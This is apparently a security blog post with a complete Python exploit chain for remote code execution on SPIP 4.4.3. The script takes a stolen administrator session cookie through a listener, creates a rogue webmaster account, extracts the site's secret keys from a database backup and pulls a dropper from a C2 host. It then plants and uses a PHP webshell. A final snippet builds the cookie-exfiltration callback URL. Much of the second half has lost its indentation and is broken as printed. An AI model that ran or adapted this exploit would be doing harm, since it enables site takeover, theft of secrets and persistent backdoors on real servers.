C110111: SPIP, Generic method to get RCE (post-auth)
Introduction
In the previous article, I explained how to achieve code execution on SPIP 4.1.16 using a generic exploitation method that leverages SPIP’s core functionality. I was curious to see whether this method could still be applied to the latest version (v4.4.3). To be honest, it turned out to be surprisingly simple: it required almost no modification to the existing exploit.
Exploit for version 4.4.3 (generic method for all versions)
As shown in the screenshots below, I didn’t need to modify the file env_gen.php, and exploit.py only required a few minor adjustments to make the exploit work on the latest version.
Once run, it gives us the following result.
POC
File: exploit.py
# For those who take pleasure in repackaging exploits for 10 seconds of
# prestige on Twitter, we see you!
import base64
import os
import random
import requests
import sqlite3
import string
import subprocess
import sys
from bs4 import BeautifulSoup
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, unquote
# Port on which this script listens to receive the administrator's cookie.
LISTENING_PORT = 1337
# URL to interact with the SPIP CMS.
SPIP_URL = sys.argv[1]
# Variable to manage script verbosity (this value should be greater than 1 to
# display certain messages).
DEBUG = 1
# This variable is used to proxify traffic to Burp when debug is enabled.
if DEBUG >= 1:
    PROXIES = {"http": "http://127.0.0.1:1348"}
else:
    # requests treats proxies=None as "no proxy"; without this branch, the
    # later calls using proxies=PROXIES would raise a NameError when DEBUG is 0.
    PROXIES = None
# Name of new administrator (random string).
NEW_ADMIN_NAME = "".join(random.choice(string.ascii_lowercase) for i in range(6))
# Name of backup (random string).
BACKUP_NAME = "".join(random.choice(string.ascii_lowercase) for i in range(7))
# IP on which the script is listening.
LISTENING_IP = "<YOUR_C2_IP>"
if DEBUG >= 1:
    LISTENING_IP = "host.docker.internal"
# Webshell name (stage 1, which also acts as persistence).
STAGE_1_NAME = "webshell.php"
# URL of webshell.
STAGE_1_URL = f"http://{LISTENING_IP}/{STAGE_1_NAME}"
# Webshell creation.
with open(f"{STAGE_1_NAME}", "wb") as f:
f.write(b"<?php system($_POST['cmd']); ?>")
# Command to execute to test the stage_1.
STAGE_1_COMMAND = "id"
# Name of the dropper, which is also the stage 0 (random string).
STAGE_0_NAME = "".join(random.choice(string.ascii_lowercase) for i in range(8))+".html"
# Dropper URL.
STAGE_0_URL = f"http://{LISTENING_IP}/{STAGE_0_NAME}"
# Dropper creation.
with open(f"{STAGE_0_NAME}", "wb") as f:
f.write(b'<html><?php $persistence=file_get_contents("')
f.write(STAGE_1_URL.encode())
f.write(b'");file_put_contents("')
f.write(STAGE_1_NAME.encode())
f.write(b'",$persistence);echo "DONE";?></html>')
# We retrieve information for the form (think of it as a complicated CSRF token).
def get_form_info(response):
    formulaire_action_args = None
    formulaire_action_sign = None
    soup = BeautifulSoup(response, "html.parser")
    for input_tag in soup.find_all("input"):
        if input_tag.get("name") == "formulaire_action_args":
            formulaire_action_args = input_tag.get("value")
        if input_tag.get("name") == "formulaire_action_sign":
            formulaire_action_sign = input_tag.get("value")
        # We search only for the first occurrence of the values.
        if formulaire_action_args is not None and formulaire_action_sign is not None:
            break
    if formulaire_action_args is None or formulaire_action_sign is None:
        print("[x] Unable to retrieve form values (formulaire_action_args, formulaire_action_sign).")
        exit(-1)
    print("[+] Form values retrieved (formulaire_action_args, formulaire_action_sign).")
    if DEBUG > 1:
        print(f"{' '*4}- formulaire_action_args: \"{formulaire_action_args}\"")
        print(f"{' '*4}- formulaire_action_sign: \"{formulaire_action_sign}\"")
    return formulaire_action_args, formulaire_action_sign
# This class simply stores the newly created user's information.
class Administrator:
    nom = NEW_ADMIN_NAME
    email = f"{NEW_ADMIN_NAME}@localdomain.localhost"
    password = f"{NEW_ADMIN_NAME}123!"
    # On re-authentication, the session is reused for the rest of the exploit.
    session = requests.session()
# Class implementing exploitation techniques.
class Exploit:
    # Function setting the various exploit parameters.
    def __init__(self, url, administrator_cookie):
        print("\n[*] Setting up the exploit ...")
        self.url = url.rstrip("/")
        self.administrator_cookie = administrator_cookie
        self.new_administrator = Administrator()
        if DEBUG:
            print(f"{' '*4}- URL: {self.url}")
            print(f"{' '*4}- Administrator's cookie: {self.administrator_cookie}")
    # Function implementing the exploit.
    def run(self):
        print("\n[*] Start of the exploit ...")
        # We begin by creating a new user.
        print("\n[*] User creation ...")
        new_url = f"{self.url}/ecrire/?exec=auteur_edit&new=oui"
        new_cookies = {"spip_session": self.administrator_cookie}
        r = requests.get(
            url=new_url,
            cookies=new_cookies,
            proxies=PROXIES
        )
        formulaire_action_args, formulaire_action_sign = get_form_info(r.text)
        # Once the form information has been obtained, we can attempt to add a
        # user.
        new_user = Administrator()
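        # "statut": "0minirezo" is SPIP's internal value for the administrator
        # status; combined with "webmestre": "oui", the new account is granted
        # full webmaster rights.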
        new_datas = {
            "exec": "auteur_edit",
            "new": "oui",
            "formulaire_action": "editer_auteur",
            "formulaire_action_args": formulaire_action_args,
            "formulaire_action_sign": formulaire_action_sign,
            "editer_auteur": "oui",
            "id_auteur": "oui",
            "nom": new_user.nom,
            "email": new_user.email,
            "statut": "0minirezo",
            "webmestre": "oui",
            "saisie_webmestre": 1,
            "new_login": new_user.nom,
            "new_pass": new_user.password,
            "new_pass2": new_user.password
        }
        r = requests.post(url=new_url, data=new_datas, cookies=new_cookies,
            proxies=PROXIES, allow_redirects=True
        )
        # Check that the user has been added.
        # Check status code.
        expected_status_code = 200
        if r.status_code != expected_status_code:
            print(f"[x] Unable to add a user (status_code not {expected_status_code}).")
            exit(-1)
        # Check that the user is present in the user list.
        condition = 0
        soup = BeautifulSoup(r.text, "html.parser")
        for a in soup.find_all("a"):
            if a.get("href") == f"mailto:{new_user.email}":
                condition = 1
        if not condition:
            print("[x] Unable to add a user (unable to find new user in user list).")
            exit(-1)
        print("[+] New administrator added.")
        if DEBUG:
            print(f"{' '*4}- Username: {new_user.nom}")
            print(f"{' '*4}- Password: {new_user.password}")
        # Now we'll authenticate with our new administrator, which will result
        # in the secret keys being backed up in the database (encrypted with
        # our password).
        print("\n[*] Authentication attempt ...")
        new_url = f"{self.url}/spip.php?page=login&url={unquote(urlparse(self.url).path)}/ecrire/"
        r = new_user.session.get(url=new_url, proxies=PROXIES, allow_redirects=True)
        formulaire_action_args, formulaire_action_sign = get_form_info(r.text)
        new_datas = {
            "page": "login",
            "url": f"{unquote(urlparse(self.url).path)}/ecrire/",
            "formulaire_action": "login",
            "formulaire_action_args": formulaire_action_args,
            "formulaire_action_sign": formulaire_action_sign,
            "var_login": new_user.nom,
            "password": new_user.password
        }
        r = new_user.session.post(url=new_url, data=new_datas,
            proxies=PROXIES, allow_redirects=True
        )
        # Check that the user has been authenticated.
        # Check status code.
        expected_status_code = 200
        if r.status_code != expected_status_code:
            print(f"[x] Unable to authenticate (status_code not {expected_status_code}).")
            exit(-1)
        # Check that the logout button is present (which means we're connected).
        condition = 0
        soup = BeautifulSoup(r.text, "html.parser")
        for a in soup.find_all("a"):
            if a.get("href") == f"{self.url}/ecrire/?exec=accueil&action=logout&logout=prive":
                condition = 1
        if not condition:
            print("[x] Unable to authenticate (can't find the logout button).")
            exit(-1)
        print("[+] New administrator authenticated.")
        # We now move on to the database backup so that we can extract the
        # important information stored in it.
        print("\n[*] Database backup attempt ...")
        new_url = f"{self.url}/ecrire/?exec=sauvegarder"
        r = new_user.session.get(url=new_url, proxies=PROXIES, allow_redirects=True)
        formulaire_action_args, formulaire_action_sign = get_form_info(r.text)
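        # Only two tables are needed: spip_auteurs holds each user's
        # "backup_cles" blob (the site's secret keys encrypted with that
        # user's password) and spip_meta holds "secret_du_site".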
        new_datas = {
            "var_ajax": "form",
            "exec": "sauvegarder",
            "formulaire_action": "sauvegarder",
            "formulaire_action_args": formulaire_action_args,
            "formulaire_action_sign": formulaire_action_sign,
            "reinstall": "non",
            "nom_sauvegarde": BACKUP_NAME,
            "tables[]": ["spip_auteurs", "spip_meta"]
        }
        r = new_user.session.post(url=new_url, data=new_datas,
            proxies=PROXIES, allow_redirects=False
        )
        expected_status_code = 200
        if r.status_code != expected_status_code:
            print(f"[x] Unable to perform backup (status_code not {expected_status_code}).")
            exit(-1)
        # As the backup is made up of several steps, each step must be executed
        # in the right order.
        condition = 0
        soup = BeautifulSoup(r.text, "html.parser")
        hrefs = []
        for a in soup.find_all("a"):
            hrefs.append(a.get("href"))
        if len(hrefs) == 2:
            condition = 1
        if not condition:
            print("[x] Unable to retrieve backup URL (can't find the download button).")
            exit(-1)
        new_url = hrefs[0]
        r = new_user.session.get(url=new_url, proxies=PROXIES, allow_redirects=True)
        new_url = f"{hrefs[0]}&step=1"
        r = new_user.session.get(url=new_url, proxies=PROXIES, allow_redirects=True)
        new_url = f"{hrefs[0]}&step=2"
        r = new_user.session.get(url=new_url, proxies=PROXIES, allow_redirects=True)
        # Backup creation check.
        new_url = f"{self.url}/ecrire/?exec=sauvegarder"
        r = new_user.session.get(url=new_url, proxies=PROXIES, allow_redirects=True)
        # We check that our backup is present in the list of backups and that a
        # download button is associated with it.
        condition = 0
        soup = BeautifulSoup(r.text, "html.parser")
        for a in soup.find_all("a"):
            if a.get("href").find(BACKUP_NAME) != -1:
                backup_url = a.get("href")
                condition = 1
        if not condition:
            print("[x] Unable to retrieve backup URL (can't find the download button).")
            exit(-1)
        print("[+] Backup performed.")
        if DEBUG:
            print(f"{' '*4}- Backup name: {BACKUP_NAME}")
            print(f"{' '*4}- URL: {backup_url}")
        # Once the backup has been created, we download it.
        print("\n[*] Downloading backup ...")
        backup_filename = ""
        with new_user.session.get(url=backup_url, proxies=PROXIES, allow_redirects=False, stream=True) as r:
            r.raise_for_status()
            backup_filename = r.headers["Content-Disposition"].split('"')[1]
            with open(backup_filename, "wb") as f:
                for chunk in r.iter_content(chunk_size=1024):
                    f.write(chunk)
        # Check that the backup is not empty.
        if len(backup_filename) == 0 or os.path.getsize(backup_filename) == 0:
            print("[x] Backup is empty (size = 0).")
            exit(-1)
        print("[+] Backup downloaded.")
        if DEBUG:
            print(f"{' '*4}- Filename: {backup_filename}")
        # Backdoor upload (stage 0).
        # This is done in several steps.
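        # The dropper is first attached as a remote document (a harmless-looking
        # .html file), then copied locally by SPIP; the payload built later will
        # make SPIP evaluate that local copy as PHP.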
print(f"\n[*] Backdoor upload (stage 0) ...")
new_url = f"{self.url}/ecrire/?exec=documents"
r = new_user.session.get(url=new_url, proxies=PROXIES, allow_redirects=True)
formulaire_action_args, formulaire_action_sign = get_form_info(r.text)
# First we add a remote link.
new_datas = {
"var_ajax": "form",
"exec": "documents",
"formulaire_action": "joindre_document",
"formulaire_action_args": formulaire_action_args,
"formulaire_action_sign": formulaire_action_sign,
"bigup_retrouver_fichiers": 1,
"methode_focus": "distant",
"url": STAGE_0_URL,
"joindre_distant": "Choisir"
}
r = new_user.session.post(url=new_url, data=new_datas,
proxies=PROXIES, allow_redirects=False
)
# Then search for the added link in the list of documents ().
r = new_user.session.get(url=new_url, proxies=PROXIES, allow_redirects=True)
edit_link = ""
soup = BeautifulSoup(r.text, "html.parser")
for a in soup.find_all("a"):
if a.get("href").find("exec=document_edit") != -1:
possible_edit_link = a.get("href")
rbis = new_user.session.get(url=possible_edit_link, proxies=PROXIES, allow_redirects=True)
if rbis.text.find(STAGE_0_URL) != -1:
edit_link = possible_edit_link
document_id = edit_link.split("=")[-1]
break
if edit_link == "":
print("[x] Unable to retrieve edit link (can't find the modify button).")
exit(-1)
if DEBUG:
print(f"{' '*4}- Edit link: {edit_link}")
print(f"{' '*4}- Document id: {document_id}")
# Once the editing link is found, browse the page to find the file editing
# parameters.
r = new_user.session.get(url=edit_link, proxies=PROXIES, allow_redirects=True)
formulaire_action_args, formulaire_action_sign = get_form_info(r.text)
# Then start a local copy of the remote file.
new_url = f"{self.url}/ecrire/?exec=document_edit"
new_datas = {
"var_ajax": "form",
"exec": "document_edit",
"formulaire_action": "editer_document",
"formulaire_action_args": formulaire_action_args,
"formulaire_action_sign": formulaire_action_sign,
"id_document": document_id,
"bigup_retrouver_fichiers": 1,
"copier_local": "Copier dans le site",
"methode_focus": "upload",
}
r = new_user.session.post(url=new_url, data=new_datas,
proxies=PROXIES, allow_redirects=True
)
expected_status_code = 200
if r.status_code != expected_status_code:
print(f"[x] File cannot be copied locally (status_code not {expected_status_code}).")
exit(-1)
# Once the file has been copied locally, we try to find its name (which
# is not the same as the specified file).
new_url = f"{self.url}/ecrire/?exec=documents"
r = new_user.session.get(url=new_url, proxies=PROXIES, allow_redirects=True)
file_to_evaluate = ""
soup = BeautifulSoup(r.text, "html.parser")
for div in soup.find_all("div"):
try:
if div.get("title").find(STAGE_0_NAME.split(".")[0]) != -1:
file_to_evaluate = div.get("title")
break
except:
pass
if file_to_evaluate == "":
print("[x] Unable to retrieve file to evaluate (can't find div title).")
exit(-1)
if DEBUG:
print(f"{' '*4}- File to evaluate: {file_to_evaluate}")
# Retrieving secrets stored in the database.
print("\n[*] Extraction of secrets ...")
        user_backup_cles, meta_secret_du_site = "", ""
        con = sqlite3.connect(backup_filename)
        cur = con.cursor()
        user_backup_cles = cur.execute(f"SELECT backup_cles FROM spip_auteurs WHERE login='{NEW_ADMIN_NAME}';").fetchall()[0][0]
        meta_secret_du_site = cur.execute("SELECT valeur FROM spip_meta WHERE nom='secret_du_site';").fetchall()[0][0]
        if user_backup_cles == "" or meta_secret_du_site == "":
            print("[x] Extraction failed.")
            exit(-1)
        print("[+] Extraction succeeded.")
        if DEBUG:
            print(f"{' '*4}- USER_BACKUP_CLES: {user_backup_cles}")
            print(f"{' '*4}- META_SECRET_DU_SITE: {meta_secret_du_site}")
        # Generation of a malicious payload to evaluate the dropper (stage 0),
        # an HTML file, as if it were a PHP file.
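        # env_gen.php (from the previous article) uses our password to decrypt
        # "backup_cles", recovers the site's keys, and emits a var_ajax_env
        # value that SPIP will accept as authentic for the targeted file.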
print("\n[*] Payload generation ...")
evaluated_file = file_to_evaluate.split(".")[0]
if DEBUG:
print(f"{' '*4}- Backdoor's filename: {evaluated_file}")
p = subprocess.Popen(
[
"php",
"env_gen.php",
new_user.password,
user_backup_cles,
meta_secret_du_site,
evaluated_file
],
stdout=subprocess.PIPE)
payload = p.communicate()[0].decode()
if DEBUG:
print(f"{' '*4}- Payload: {payload}")
# Evaluation of the HTML file (as PHP).
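        # Posting var_ajax=1 with the crafted var_ajax_env to the site root is
        # the generic primitive from the previous article: SPIP processes the
        # forged env and evaluates the uploaded HTML file as PHP, so the
        # dropper prints "DONE" once stage 1 has been written.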
print("\n[*] Evaluation of the uploaded file (RCE) ...")
new_url = f"{self.url}/"
new_datas = {
"var_ajax": "1",
"var_ajax_env": payload
}
r = new_user.session.post(url=new_url, data=new_datas,
proxies=PROXIES, allow_redirects=False
)
if r.text.find("DONE") == -1:
print("[x] Exploit failed.")
exit(-1)
print(f"[+] Exploit succeeded.")
# Attempt to interact with webshell.
print("\n[*] Attempt to interact with webshell ...")
print("[+] Output:")
new_url = f"{self.url}/webshell.php"
new_datas = {
"cmd": STAGE_1_COMMAND,
}
r = new_user.session.post(url=new_url, data=new_datas,
proxies=PROXIES, allow_redirects=False
)
print(r.text)
# Little clean-up on the C2.
for file in [STAGE_1_NAME, STAGE_0_NAME, backup_filename]:
os.remove(file)
# Last warning before bedtime.
print("\n[!] Remember to clean up after yourself (user creation, database backup, uploaded file, etc.)")
exit(0)
# This class retrieves an administrator's cookie and automatically continues
# the exploitation chain (up to the upload of a backdoor).
class CustomServerClass(BaseHTTPRequestHandler):
    def _set_response(self):
        self.send_response(200)
        self.send_header("Content-type", "text/html")
        self.end_headers()

    def do_GET(self):
        self._set_response()
        self.wfile.write("cheh".encode())
        query = urlparse(self.path).query
        try:
            params = query.split("&")
        except:
            params = [query]
        for param in params:
            if param.find("cookie") != -1 and param != "cookie=":
                # As the cookie is received in an encoded way (base64), we
                # decode it and extract only the useful part to be able to
                # replay it.
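                # Expected callback format (hypothetical session value):
                #   GET /?cookie=<urlencode(base64("spip_session=<value>;"))>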
                cookie = base64.b64decode(unquote(param.split("=")[1]).encode()).decode().split("=")[1].rstrip(";")
                print(f"[+] Cookie captured (cookie: {cookie})")
                # Launch of the exploit.
                Exploit(SPIP_URL, cookie).run()
def run(server_class=HTTPServer, handler_class=CustomServerClass, port=LISTENING_PORT):
    httpd = server_class(("", port), handler_class)
    print(f"[*] Starting httpd (on port {port})...")
    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        pass
    httpd.server_close()
    print("[*] Stopping httpd ...")
if __name__ == "__main__":
    run()
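For reference, here is a minimal sketch of how the listener can be triggered once an administrator's spip_session value is in hand (for instance via an XSS payload, as in the previous article). The C2 address and session value below are hypothetical placeholders; only the encoding has to match what do_GET() expects.
# Minimal sketch: build the callback URL that do_GET() expects, i.e. a
# URL-encoded, base64-encoded "spip_session=<value>;" string passed in the
# "cookie" query parameter. All values below are placeholders.
import base64
from urllib.parse import quote

C2 = "http://<YOUR_C2_IP>:1337"                     # where exploit.py listens
spip_session = "1234_exampleexampleexampleexample"  # hypothetical admin session

encoded = quote(base64.b64encode(f"spip_session={spip_session};".encode()).decode())
print(f"{C2}/?cookie={encoded}")

# Having the administrator's browser fetch that URL (or fetching it yourself)
# kicks off the full chain started with:
#   python3 exploit.py http://target-spip.example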